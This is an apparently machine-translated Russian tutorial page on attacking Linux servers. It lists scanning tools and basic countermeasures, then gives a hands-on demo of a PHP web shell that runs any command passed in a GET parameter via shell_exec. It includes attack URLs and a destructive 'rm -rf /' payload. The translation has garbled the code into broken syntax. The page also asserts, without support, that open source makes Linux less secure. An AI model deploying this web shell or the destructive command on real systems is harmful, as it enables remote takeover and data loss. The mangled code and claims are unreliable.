Взлом ОС Linux: взлом с помощью Ubuntu (Учебник по командам)

Linux — наиболее широко используемая серверная операционная система, особенно для веб-серверов. Это открытый исходный код; это означает, что любой может иметь доступ к исходному коду. Это делает его менее безопасным по сравнению с другими операционными системами, поскольку злоумышленники могут изучить исходный код для поиска уязвимостей. Linux для хакеров — это использование этих уязвимостей для получения несанкционированного доступа к системе.

В этой статье мы познакомим вас с тем, что такое Linux, его уязвимостями безопасности, взломом с помощью Ubuntu и мерами противодействия, которые вы можете принять.

Краткое примечание по Linux

Linux — это операционная система с открытым исходным кодом. Существует множество дистрибутивов операционных систем на основе Linux, таких как Redhat, Fedora, Ubuntu и т.д. В отличие от других операционных систем, Linux менее безопасен с точки зрения безопасности. Это связано с тем, что исходный код доступен бесплатно, поэтому его легко изучить на предмет уязвимостей и использовать их по сравнению с другими операционными системами, не имеющими открытого исходного кода. Linux можно использовать в качестве операционной системы сервера, настольного компьютера, планшета или мобильного устройства.

Программами Linux можно управлять с помощью графического интерфейса пользователя или команд. Команды Linux для взлома Kali Linux более эффективны и действенны по сравнению с использованием графического интерфейса. По этой причине полезно знать основные команды Linux для взлома.

Инструменты для взлома Linux

  • Nessus — этот инструмент можно использовать для взлома Ubuntu, настроек конфигурации сканирования, исправлений, сетей и т.д. Его можно найти по адресу https://www.tenable.com/products/nessus
  • NMap. Этот инструмент можно использовать для мониторинга хостов, работающих на сервере, и служб, которые они используют. Его также можно использовать для поиска портов. Его можно найти на https://nmap.org/
  • SARA — SARA — это аббревиатура от Security Auditor’s Research Assistant. Как следует из названия, этот инструмент можно использовать для аудита сетей на предмет угроз, таких как SQL Injection, XSS и т. Д., Его можно найти по адресу

Приведенный выше список не является исчерпывающим; он дает вам представление об инструментах, доступных для взлома Ubuntu и систем Linux.

Как предотвратить взлом Linux

Linux Hacking использует уязвимости в операционной системе. Организация может принять следующую политику для защиты от таких атак.

  • Управление исправлениями — исправления исправляют ошибки, которые злоумышленники используют для компрометации системы. Хорошая политика управления исправлениями гарантирует, что вы постоянно применяете соответствующие исправления к своей системе.
  • Правильная конфигурация ОС — другие эксплойты используют слабые места в конфигурации сервера. Неактивные имена пользователей и демоны должны быть отключены. Следует изменить настройки по умолчанию, такие как общие пароли для приложений, имена пользователей по умолчанию и некоторые номера портов.
  • Система обнаружения вторжений — такие инструменты могут использоваться для обнаружения несанкционированного доступа к системе. Некоторые инструменты могут обнаруживать и предотвращать такие атаки.

Хакерские действия: взломать систему Ubuntu Linux с помощью PHP

В этом практическом сценарии мы узнаем, как взломать Ubuntu, и предоставим вам основную информацию о том, как вы можете использовать PHP для взлома Linux. Мы не собираемся нацеливаться ни на одну жертву. Если вы хотите попробовать, вы можете установить LAMPP на свой локальный компьютер.

PHP имеет две функции, которые можно использовать для выполнения команд взлома Linux. Он имеет функции exec () и shell_exec (). Функция exec () возвращает последнюю строку вывода команды, а shell_exec () возвращает весь результат команды в виде строки.

В демонстрационных целях предположим, что менеджеры злоумышленников загружают следующий файл на веб-сервер.

<? php $ cmd = isset ($ _ GET [‘cmd’])? $ _GET [‘cmd’]: ‘ls -l’; echo «выполнение команды оболочки: -> $ cmd «;

$ output = shell_exec ($ cmd);

echo »

 $ output

«;

?>

ВОТ,

Приведенный выше сценарий получает команду из переменной GET с именем cmd. Команда выполняется с помощью shell_exec (), а результаты возвращаются в браузере.

Вышеупомянутый код можно использовать, используя следующий URL-адрес

http: //localhost/cp/konsole.php? cmd = ls% 20-l

ВОТ,

«… Konsole.php? Cmd = ls% 20-l» присваивает значение ls –l переменной cmd .

Команда в Ubuntu для взлома сервера будет выполняться как

  • shell_exec (‘ls -l’);

Выполнение вышеуказанного кода на веб-сервере дает результаты, аналогичные следующим.

vzlom-linux

Приведенная выше команда просто отображает файлы в текущем каталоге и разрешения

Предположим, злоумышленник передает следующую команду

rm -rf /

ВОТ,

  • «Rm» удаляет файлы
  • «Rf» заставляет команду rm работать в рекурсивном режиме. Удаление всех папок и файлов
  • «/» Указывает команде начать удаление файлов из корневого каталога.

URL атаки будет выглядеть примерно так:

http: //localhost/cp/konsole.php? cmd = rm% 20-rf% 20 /

Выводы

  • Linux — популярная операционная система для серверов, настольных компьютеров, планшетов и мобильных устройств.
  • Linux имеет открытый исходный код, и исходный код может получить любой желающий. Это позволяет легко обнаружить уязвимости. Это одна из лучших ОС для хакеров.
  • Базовые и сетевые команды взлома в Ubuntu очень ценны для хакеров Linux.
  • Уязвимости — это слабые места, которые можно использовать для компрометации системы.
  • Хорошая безопасность может помочь защитить систему от взлома злоумышленником.

Интересные записи:

Понравилась статья? Поделиться с друзьями:
Добавить комментарий

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!: